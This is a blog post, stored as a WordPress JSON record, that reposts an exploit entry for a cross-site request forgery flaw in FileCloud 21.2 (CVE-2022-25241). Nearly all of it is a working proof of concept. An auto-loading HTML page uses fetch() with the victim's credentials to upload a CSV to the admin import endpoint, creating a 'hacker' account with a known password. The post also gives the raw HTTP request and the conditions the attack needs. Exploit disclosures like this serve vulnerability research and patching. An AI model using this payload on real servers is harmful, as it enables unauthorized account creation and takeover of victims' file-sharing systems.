{"id":20922,"date":"2022-02-22T09:31:44","date_gmt":"2022-02-22T06:31:44","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166074\/filecloud212-xsrf.txt"},"modified":"2022-02-22T10:11:49","modified_gmt":"2022-02-22T06:41:49","slug":"filecloud-21-2-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/filecloud-21-2-cross-site-request-forgery\/","title":{"rendered":"FileCloud 21.2 Cross Site Request Forgery"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: FileCloud 21.2 &#8211; Cross-Site Request Forgery (CSRF)<br \/>\n# Date: 2022-02-20<br \/>\n# Exploit Author: Masashi Fujiwara<br \/>\n# Vendor Homepage: https:\/\/www.filecloud.com\/<br \/>\n# Software Link: https:\/\/hub.docker.com\/r\/filecloud\/filecloudserver21.2<br \/>\n# Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447)<br \/>\n# Tested on:<br \/>\n# OS: Ubuntu 18.04.6 LTS (Docker)<br \/>\n# Apache: 2.4.52<br \/>\n# FileCloud: 21.2.4.17315<br \/>\n# CVE: CVE-2022-25241 (https:\/\/www.filecloud.com\/supportdocs\/fcdoc\/latest\/server\/security-advisories\/advisory-2022-01-3-threat-of-csrf-via-user-creation)<\/p>\n<p dir=\"ltr\"># Conditions<br \/>\n1. Only vulnerable if cookies have samesite set to None (SameSite=None).<br \/>\necho &#8216;define(&#8220;TONIDOCLOUD_COOKIE_SAME_SITE_TYPE&#8221;, &#8220;None&#8221;);&#8217; &gt;&gt; \/var\/www\/html\/config\/cloudconfig.php<br \/>\n2. Use https as target url (When cookies set SameSite=None, also set Secure).<\/p>\n<p dir=\"ltr\"># PoC (HTML)<br \/>\n&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;meta http-equiv=&#8221;Pragma&#8221; content=&#8221;no-cache&#8221;&gt;<br \/>\n&lt;meta http-equiv=&#8221;Cache-Control&#8221; content=&#8221;no-cache&#8221;&gt;<\/p>\n<p dir=\"ltr\">&lt;script&gt;<br \/>\nfunction init(){<br \/>\nmyFormData = new FormData();<br \/>\nlet fileContent = new Blob([&#8220;UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\\nhacker,hacker@hacker.com,Password1,hacker,FULL,02\/26\/2222,Group1,YES\\n&#8221;], {type: &#8216;application\/vnd.ms-excel&#8217;});<br \/>\nmyFormData.append(&#8220;uploadFormElement&#8221;, fileContent, &#8220;user.csv&#8221;);<br \/>\nfetch(&#8220;https:\/\/192.168.159.129:8443\/admin\/?op=import&amp;sendapprovalemail=0&amp;sendpwdasplaintext=0&#8221;, { method: &#8220;post&#8221;, body: myFormData, credentials: &#8220;include&#8221;});<br \/>\n}<br \/>\n&lt;\/script&gt;<br \/>\n&lt;\/head&gt;<br \/>\n&lt;body onload=&#8221;init()&#8221;&gt;<br \/>\nCSRF PoC for CVE-2022-25241<\/p>\n<p dir=\"ltr\">Creat hacker user with Password1 via CSV file upload.<br \/>\n&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<\/p>\n<p dir=\"ltr\"># HTTPS Request<br \/>\nPOST \/admin\/?op=import&amp;sendapprovalemail=0&amp;sendpwdasplaintext=0 HTTP\/1.1<br \/>\nHost: 192.168.159.129:8443<br \/>\nCookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493<br \/>\nContent-Length: 365<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.102 Safari\/537.36<br \/>\nContent-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundaryiAXsUsJ2ZV54DFuW<br \/>\nConnection: close<\/p>\n<p dir=\"ltr\">&#8212;&#8212;WebKitFormBoundaryiAXsUsJ2ZV54DFuW<br \/>\nContent-Disposition: form-data; name=&#8221;uploadFormElement&#8221;; filename=&#8221;user.csv&#8221;<br \/>\nContent-Type: application\/vnd.ms-excel<\/p>\n<p dir=\"ltr\">UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified<br \/>\nhacker,hacker@hacker.com,Password1,hacker,FULL,02\/26\/2222,Group1,YES<\/p>\n<p dir=\"ltr\">&#8212;&#8212;WebKitFormBoundaryiAXsUsJ2ZV54DFuW&#8211;<\/p>\n<p dir=\"ltr\"># CSV file format<br \/>\nUserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified<br \/>\nhacker,hacker@hacker.com,Password1,hacker,FULL,02\/26\/2222,Group1,YES<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: FileCloud 21.2 &#8211; Cross-Site Request Forgery (CSRF) # Date: 2022-02-20 # Exploit Author: Masashi Fujiwara # Vendor Homepage: https:\/\/www.filecloud.com\/ # Software Link: https:\/\/hub.docker.com\/r\/filecloud\/filecloudserver21.2 # Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447) # Tested on: # OS: Ubuntu 18.04.6 LTS (Docker) # Apache: 2.4.52 # FileCloud: 21.2.4.17315 # CVE: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-20922","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20922","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=20922"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20922\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=20922"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=20922"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=20922"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}